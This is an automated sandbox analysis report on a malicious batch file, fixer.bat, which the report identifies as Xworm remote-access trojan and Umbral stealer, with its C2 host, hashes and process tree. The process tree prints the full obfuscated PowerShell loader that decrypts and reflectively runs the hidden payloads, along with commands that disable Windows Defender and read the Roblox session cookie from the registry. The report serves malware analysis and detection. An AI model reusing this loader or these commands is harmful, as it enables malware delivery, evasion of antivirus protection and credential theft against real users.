Overview

overview

10

Static

static

1

fixer.bat

windows10-ltsc 2021-x64

10

Resubmissions

01-12-2024 17:49

241201-wd91zaskbr 10

01-12-2024 17:46

241201-wcqkyaxmaw 10

01-12-2024 17:37

241201-v7ftjsxlcv 10

Analysis

  • max time kernel
    45s
  • max time network
    80s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241023-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    01-12-2024 17:46

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    fixer.bat

  • Size

    259KB

  • MD5

    63f3ebe3fe598479517c1843d1f05944

  • SHA1

    4aaeed78293c47805595957cc3fa71d5fdd07d15

  • SHA256

    48b14d5f105efa0097cc24de8bbf0c334da58906addc06a9a42fe8274d8759e2

  • SHA512

    12d5f9c569812a7cef6838c64414757689ee811aecfbc21465b36c0bcecb755b8d75a5f5663bbc5e7d102532ed64cc788b370a00464869044e8576699d0b1e7b

  • SSDEEP

    6144:SIujxg7ViKrBi4Jya9IlvpPxmbkdtEGQQ9ZGeRFBc81tx4Z:m8VTrBiuEpYI3EQzJRFB5GZ

Score
10/10
umbralxwormdiscoveryexecutionratspywarestealertrojan

Malware Config

Extracted

Family

xworm

Version

5.0

C2

cheflilou-43810.portmap.host:43810

Mutex

q2m91QtHDnjEQolK

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

aes.plain

Signatures

  • Detect Umbral payload 2 IoCs
  • Detect Xworm Payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Umbral family
    umbral
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Drops file in Drivers directory 1 IoCs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 33 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\fixer.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4068
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLcV5Di0lrYzeB8Z5oXuvc+IYrKKIGk30pV1obfMeT4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8hV4bFs+GCRTAu0FDqlpAg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $JhDGU=New-Object System.IO.MemoryStream(,$param_var); $kMVbR=New-Object System.IO.MemoryStream; $mBSnP=New-Object System.IO.Compression.GZipStream($JhDGU, [IO.Compression.CompressionMode]::Decompress); $mBSnP.CopyTo($kMVbR); $mBSnP.Dispose(); $JhDGU.Dispose(); $kMVbR.Dispose(); $kMVbR.ToArray();}function execute_function($param_var,$param2_var){ $fmLYa=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $hvYPj=$fmLYa.EntryPoint; $hvYPj.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\fixer.bat';$TAymA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\fixer.bat').Split([Environment]::NewLine);foreach ($kvbgu in $TAymA) { if ($kvbgu.StartsWith(':: ')) { $IkiFk=$kvbgu.Substring(3); break; }}$payloads_var=[string[]]$IkiFk.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Drops startup file
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3608
      • C:\Users\Admin\AppData\Local\Temp\ficybd.exe
        "C:\Users\Admin\AppData\Local\Temp\ficybd.exe"
        3⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4036
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" csproduct get uuid
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2320
        • C:\Windows\SYSTEM32\attrib.exe
          "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\ficybd.exe"
          4⤵
          • Views/modifies file attributes
          PID:644
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ficybd.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1356
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          PID:3684
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          PID:3276
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:3256
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" os get Caption
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:5064
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" computersystem get totalphysicalmemory
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:3972
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" csproduct get uuid
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:2164
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          PID:2640
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic" path win32_VideoController get name
          4⤵
          • Detects videocard installed
          • Suspicious behavior: EnumeratesProcesses
          PID:2232
        • C:\Windows\SYSTEM32\cmd.exe
          "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\ficybd.exe" && pause
          4⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Suspicious use of WriteProcessMemory
          PID:1704
          • C:\Windows\system32\PING.EXE
            ping localhost
            5⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:4988

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    3KB

    MD5

    3eb3833f769dd890afc295b977eab4b4

    SHA1

    e857649b037939602c72ad003e5d3698695f436f

    SHA256

    c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

    SHA512

    c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    ad8d5687e7c2fb53a11e30b13b4481d2

    SHA1

    37b8b35e5d41b21d5a6afd343dbcde469571d60a

    SHA256

    c39aa3bb59ecd45342a4f8deeff6910ea66769fb6179562824a7802516fd4f28

    SHA512

    70cc821047b027a53a9567354c03ae058974adb13613dc06127bfef86daed25783182c7e24751483db1f9938de44eccb2c634579457c7f6b2ac403e68ee3004e

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    60b3262c3163ee3d466199160b9ed07d

    SHA1

    994ece4ea4e61de0be2fdd580f87e3415f9e1ff6

    SHA256

    e3b30f16d41f94cba2b8a75f35c91ae7418465abfbfe5477ec0551d1952b2fdb

    SHA512

    081d2015cb94477eb0fbc38f44b6d9b4a3204fb3ad0b7d0e146a88ab4ab9a0d475207f1adae03f4a81ccc5beb7568dc8be1249f69e32fe56efd9ee2f6ee3b1af

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    948B

    MD5

    9e84791e002bacedd66f4fb293b6ff63

    SHA1

    0711b437e7f394521c3b0c701e35b761d6b2fa07

    SHA256

    e2a9eccacf36d9db2d21db98b6f48f4eed5913c291a27049e7aa75ff65ad7a84

    SHA512

    5ebf3ce590b3cb5fc7fd53d5af5bb3d84f5910171e61de293c00b1c8d26324d849745fa816c38ee90c30e438c71e8a1d7df6e63438810c8e5ed12b3d112884e1

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    8e1fdd1b66d2fee9f6a052524d4ddca5

    SHA1

    0a9d0994559d1be2eecd8b0d6960540ca627bdb6

    SHA256

    4cc7c1b79d1b48582d4dc27ca8c31457b9bf2441deb7914399bb9e6863f18b13

    SHA512

    5a5494b878b08e8515811ab7a3d68780dac7423f5562477d98249a8bedf7ec98567b7cd5d4c6967d6bc63f2d6d9b7da9a65e0eb29d4b955026b469b5b598d1f3

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lhuktmxb.ian.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\ficybd.exe
    Filesize

    227KB

    MD5

    d2d3a70b2bb57de2e98a24e8dac7a79c

    SHA1

    1d527ece8a8a52948928a8b1c15bbe329c16f4db

    SHA256

    7c686dffa28318119a8c0a5fbd17fb828894470f8b61f3d3339393c3f634391a

    SHA512

    de561197eb37385c46a461c04066c45c1b8be2136c16524e04085a8bdf46b1073b20bd86de45cee296619c166cd1acee7921ffe60fa7c9bdd95d9a7a95787687

    Download Submit

  • memory/3608-16-0x00000201FECE0000-0x00000201FECEE000-memory.dmp

    Filesize

    56KB

    Download

  • memory/3608-15-0x00000201FEC90000-0x00000201FECC2000-memory.dmp

    Filesize

    200KB

    Download

  • memory/3608-20-0x00007FFDF6C53000-0x00007FFDF6C55000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3608-21-0x00007FFDF6C50000-0x00007FFDF7712000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3608-14-0x00000201FC5C0000-0x00000201FC5C8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/3608-0-0x00007FFDF6C53000-0x00007FFDF6C55000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3608-13-0x00007FFDF6C50000-0x00007FFDF7712000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3608-12-0x00007FFDF6C50000-0x00007FFDF7712000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3608-11-0x00007FFDF6C50000-0x00007FFDF7712000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3608-6-0x00000201FC560000-0x00000201FC582000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4036-36-0x000001E9F6520000-0x000001E9F6560000-memory.dmp

    Filesize

    256KB

    Download

  • memory/4036-64-0x000001E9F8A90000-0x000001E9F8AAE000-memory.dmp

    Filesize

    120KB

    Download

  • memory/4036-63-0x000001E9F8AE0000-0x000001E9F8B30000-memory.dmp

    Filesize

    320KB

    Download

  • memory/4036-62-0x000001E9F8C80000-0x000001E9F8CF6000-memory.dmp

    Filesize

    472KB

    Download

  • memory/4036-89-0x000001E9F8AB0000-0x000001E9F8ABA000-memory.dmp

    Filesize

    40KB

    Download

  • memory/4036-90-0x000001E9F8E00000-0x000001E9F8E12000-memory.dmp

    Filesize

    72KB

    Download

  • memory/4036-37-0x00007FFDF6C50000-0x00007FFDF7712000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4036-110-0x00007FFDF6C50000-0x00007FFDF7712000-memory.dmp

    Filesize

    10.8MB

    Download